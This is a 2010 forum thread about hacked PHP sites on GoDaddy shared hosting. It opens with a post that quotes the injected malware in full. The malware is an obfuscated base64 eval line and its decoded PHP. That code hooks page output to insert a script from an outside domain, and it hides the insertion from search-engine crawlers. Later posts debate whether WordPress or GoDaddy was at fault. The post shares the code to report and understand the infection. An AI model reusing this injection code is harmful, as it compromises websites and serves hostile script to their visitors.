GoDaddy Got Hacked Yesterday

[TonyLock]

I'm sure some of you may be aware of the situation But as of yesterday (May 1, 2010) at around 2 AM, there was a major hack attempt on GoDaddy. At about 10 AM, GoDaddy Tweeted about this matter (See Tweet: http://twitter.com/GoDaddy/status/13199601776). The issue has not affected all of their hosting accounts and is still being investigated. The issue is not due to a flaw in WordPress as GoDaddy claims, a friend has a site that only has her own hand written PHP code and nothing more. Despite taking my friend is super obsessive about security and knows for a fact her FTP account was not compromised, she found all the PHP files on her server to be infected, even those not publicly available.

When you view the source of any of the PHP pages through the browser, you see the following line inserted just before the </body> tag:

<script src="https://kdjkfjskdfjlskdjf.com/kp.php"></script>

When you examine each of the PHP pages, you see this line at the top of all of them (This was the hacked code):

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5clpHcHJabXB6YTJSbWFteHphMlJxWmk1amIyMHZhM0F1Y0dod0lqNDhMM05qY21sd2REND0iKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>

When you decode this, it equates to:

if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){   $GLOBALS['mr_no']=1;
	if(!function_exists('mrobh')){
		if(!function_exists('gml')){
			function gml(){
				if (!stristr($_SERVER["HTTP_USER_AGENT"],"googlebot")&& (!stristr($_SERVER["HTTP_USER_AGENT"],"yahoo"))){
					return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9rZGprZmpza2Rmamxza2RqZi5jb20va3AucGhwIj48L3NjcmlwdD4=");
				}
				return "";
			}
		}
        if(!function_exists('gzdecode')){
			function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){
				$R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
				$RBE4C4D037E939226F65812885A53DAD9=10;
				$RA3D52E52A48936CDE0F5356BB08652F2=0;
      			if($R30B2AB8DC1496D06B230A71D8962AF5D&4){
      				$R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
       				$R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
       				$RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
       			}
    			if($R30B2AB8DC1496D06B230A71D8962AF5D&8){
					$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
      			}
      			if($R30B2AB8DC1496D06B230A71D8962AF5D&16){
      				$RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
      			}
				if($R30B2AB8DC1496D06B230A71D8962AF5D&2){
					$RBE4C4D037E939226F65812885A53DAD9+=2;
      			}
      			$R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
      			if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){
      				$R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
      			}
      			return $R034AE2AB94F99CC81B389A1822DA3353;
     		}
		}
		function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){
			Header('Content-Encoding: none');
			$RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
			if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
				return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
			}else{
				return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
			}
		}
		ob_start('mrobh');
	}
}

I don't really understand what this code exactly does. Can any PHP code experts decipher it?

GoDaddy claimed they will investigate the issue but when my friend called, she found the tech support staff were completely oblivious to the matter.

So, if you are one of the unlucky ones whose server was a part of the attack, please check the bottom of your source code to make sure the <script> tag isn't there. Otherwise contact GoDaddy and complain.

[Andrew Lyle Global Moderator]

Just to let you know that my site was infected... I dont have any wordpress installation (not any contact with wordpress).

I think is a GoDaddy security issue.

Open source project is commonly used by hackers to trigger this kind of attacks but we have to take in account that exist infected sites without wordpress.

Hope this helps...

Doesn't exactly help, as many claims of people not having WordPress installed popped up, ie TonyLock, who for days argued that his two friends did not have WordPress installed. But speaking with GoDaddy, they said every account they looked up, had some trace of an outdated version of WordPress, either inactive or active on their account. Now, i'm hearing reports that hackers could easily gain access to an entire server, which could access up-to 20-40 accounts on a single server. This could possibly be what GoDaddy is referring to when they said some trace of WordPress was found on users accounts.

Eitherway, the coordinated attack only targeted WordPress, afaik, which is very, very likely the only cause for this.

[Kudos Veteran]

Doesn't exactly help, as many claims of people not having WordPress installed popped up, ie TonyLock, who for days argued that his two friends did not have WordPress installed. But speaking with GoDaddy, they said every account they looked up, had some trace of an outdated version of WordPress, either inactive or active on their account. Now, i'm hearing reports that hackers could easily gain access to an entire server, which could access up-to 20-40 accounts on a single server. This could possibly be what GoDaddy is referring to when they said some trace of WordPress was found on users accounts.

Eitherway, the coordinated attack only targeted WordPress, afaik, which is very, very likely the only cause for this.

You only need one massively outdated Wordpress install on a godaddy box to infect the whole thing. "up to 20-40," more like 100-200, this is a godaddy box we're talking about. Suphp has been around a long time, it's about time godaddy caught up and stopped blaming third-parties.

[primexx]

Doesn't exactly help, as many claims of people not having WordPress installed popped up, ie TonyLock, who for days argued that his two friends did not have WordPress installed. But speaking with GoDaddy, they said every account they looked up, had some trace of an outdated version of WordPress, either inactive or active on their account. Now, i'm hearing reports that hackers could easily gain access to an entire server, which could access up-to 20-40 accounts on a single server. This could possibly be what GoDaddy is referring to when they said some trace of WordPress was found on users accounts.

Eitherway, the coordinated attack only targeted WordPress, afaik, which is very, very likely the only cause for this.

that's a very warped definition of "some traces... was found on users accounts" if it's taken to mean that "a user's account had no traces of the files but another user's account who was on the same server did".

and how is it a wordpress problem when one vulnerable install can go out and contaminate everyone else's accounts? this point seems to be universally conceded, and if that's the case, then it's absolutely godaddy's fault for not securing their servers and isolating each account properly.

[Andrew Lyle Global Moderator]

I'm just going by the data that godaddy told me directly. People can argue all they want about the issue, and pull facts from all over the Internet, but 99% of them are likely to be opinions and theories.

I spoke to godaddy's security team directly, over the phone.

[primexx]

I'm just going by the data that godaddy told me directly. People can argue all they want about the issue, and pull facts from all over the Internet, but 99% of them are likely to be opinions and theories.

I spoke to godaddy's security team directly, over the phone.

i understand that, but the information i've read on neowin - the official information that you've posted - strongly suggests that godaddy is at fault here, especially considering that there's not been reports of the same outdated installations on other major web hosts causing this much trouble as well. I don't understand why you're consistently defending them without questioning the official story even a little bit.

if it turns out to be something inherent to the way shared hosts are set up, then we'd have much more problems than simply pointing fingers at everyone.

[Andrew Lyle Global Moderator]

What? What you just posted doesn't actually make sense. You said I'm posting that they are strongly at fault, but in defending them?

It's one side or the other. I talked to godaddy and cleared up the entire issue, it was an outdated version of wordpress exploit and only attacked shared Linux hosts.

There is nothing really more to the story than that.

[primexx]

What? What you just posted doesn't actually make sense. You said I'm posting that they are strongly at fault, but in defending them?

It's one side or the other. I talked to godaddy and cleared up the entire issue, it was an outdated version of wordpress exploit and only attacked shared Linux hosts.

There is nothing really more to the story than that.

sorry i meant that the facts you've posted (i.e. an outdated wp on one account could be exploited to infect other accounts on the same server) suggests they have security problems. I didn't mean that you actually said they were at fault.

it's clear that outdated versions of WP was exploited, but I don't see how that clears up the issue of it being able to infect other hosting accounts.

[x9248]

You only need one massively outdated Wordpress install on a godaddy box to infect the whole thing. "up to 20-40," more like 100-200, this is a godaddy box we're talking about. Suphp has been around a long time, it's about time godaddy caught up and stopped blaming third-parties.

More like 1000's :whistle: I'm currently on a shared Linux plan and I'm sharing with 6,575 other sites.

But yea, I've been running WordPress since November and I wasn't affected with this recent problem.

[Andrew Lyle Global Moderator]

More like 1000's :whistle: I'm currently on a shared Linux plan and I'm sharing with 6,575 other sites.

But yea, I've been running WordPress since November and I wasn't affected with this recent problem.

to be honest, most of those websites are inactive / using very little to no resources and/or storage space.

How did you find out you're sharing with 6,575 other websites?

[Cupcakes]

to be honest, most of those websites are inactive / using very little to no resources and/or storage space.

How did you find out you're sharing with 6,575 other websites?

Inactive accounts are worse than active :3.

I know no one offhand that's hosted on GoDaddy but went on Twitter search and grabbed a random GoDaddy customer's site:

stephenpsmith.com resolves to 208.109.181.42 and only has 162 other sites hosted on the server that account is on.

FAR from that 6,000 other sites claimed above.

So with that being said, x9248, I'm definitely also interested in your server's IP so I can check out to see if it does in fact host that many accounts on a single server :)

[Kudos Veteran]

I'm just going by the data that godaddy told me directly. People can argue all they want about the issue, and pull facts from all over the Internet, but 99% of them are likely to be opinions and theories.

I spoke to godaddy's security team directly, over the phone.

That's a fine attitude for a reporter, allow me to paraphrase "The accused in this debacle says so, it must be true! No further investigation needed or wanted. You guys don't know what you are talking about."

There's no pulling "facts from all over the internet," I and others posting here work in the business, I find your ignorance of that offensive.

[x9248]

It's not like I just pulled a number out my arse, it's what the whois says.

Could it be wrong? Hell I dunno, it's what I'm going by tho.

[Andrew Lyle Global Moderator]

It's not like I just pulled a number out my arse, it's what the whois says.

Could it be wrong? Hell I dunno, it's what I'm going by tho.

Wow, I didn't know the numbers were so high.

[Cupcakes]

Why are you blocking out the domain name? For all I know that could be a domain that's using parked nameservers.

[x9248]

Well assume what you want then.

[HawkMan]

Wow, I didn't know the numbers were so high.

They may dynamically shift site on the serves based on traffic, resulting in some server having a rather high amount of sites with extremely little traffic, while more active site could end up with fewer sites per server.

[Cupcakes]

Well assume what you want then.

I already am. I can post up the same as you and claim it's from a domain hosted by GoDaddy:

[x9248]

Congratulations, you win the internet :rolleyes:

One, my site contains content that is against Neowins rules. Two, I do not pay for domain privacy and all my information comes up on the whois. Three, it's really none of your business.

Believe what you want, but I stated nothing but facts.

Edit: Actually if you are sooooo intent in proving me wrong, PM me and I'll be happy to give you the domain name.

[Droid2010]

Hi, I am new to this board but I cam across this because I to was attacked, and GoDaddy basically directs me to their blog about wordpress issue. Since my site is on JOOMLA and I have no wordpress files in my system, that link doesn't work for me.

I have told them to update that blog to tell people that it has to do with Php scripts, that is how the virus is getting around. They still don't believe me.

I told them that this is a server issue. They said they can't find anything on the server to prove it. The support team gives me a general response and doesn't respond to my questions. I give them proof that I am not the only one who got hacked, again they don't believe me. in the end, they said it is my fault the hack happened and now theirs.

So I got upset and wrote an article about this, because I know there are others out there. Since then I have been receiving emails about the same thing. Their support team doesn't care about the customers and tells them to change the password or update wordpress.

kind of hard to update wordpress when there are people who, like myself, do not use wordpress..

and they keep saying my website is 'escalated' , they have been saying that since Monday and well, it is almost Thursday. What are they doing? Drinking coffee laughing as us customers because we are frustrated?? My site was flagged because of them! I lost business because of them and they said to me "its not our fault your website got a hack code"

I want to pull my hair out. I hate their general responses. They need to take responsibility for what they did and of course they won't. Because it is 'our fault' it happened.

and another thing, I even showed them proof, this link and others to prove that everyone so far are saying that this is due to SHARED hosting i.e. server.

of course GoDaddy doesn't believe me. They are getting annoyed by me because I am trying to help them solve this issue quickly by giving them input.

I have words for them right now, I will not say on the internet :)

hopefully this issue will get solved SOONER than later and fyi GoDaddy peeps, I got rid of the virus, three days later it came back again and I got rid of it again. I am a cpu tech person I went thru it line-by-line for a looong time today as well as Sunday. So I know the codes are gone but again GoDaddy thinks that I missed code. I might have but I did look through 6,000K and also check it with Notepad++, probably what they would do. So I made sure I didn't miss anything.

So again, if it goes away what the heck is making it come back?!?! Oh right, because their servers are affected! duh!

[primexx]

didn't they also screw over their customers with domain name registration a while ago too?

[Droid2010]

didn't they also screw over their customers with domain name registration a while ago too?

I think so. But then again, you ask them they will be like "oh no that isn't true. You are the one who messed up" lol

[Ndoki]

I found a free fix instruction to remove it at http://www.digitaldrake.com/wordpress-hack-cleanup-solution/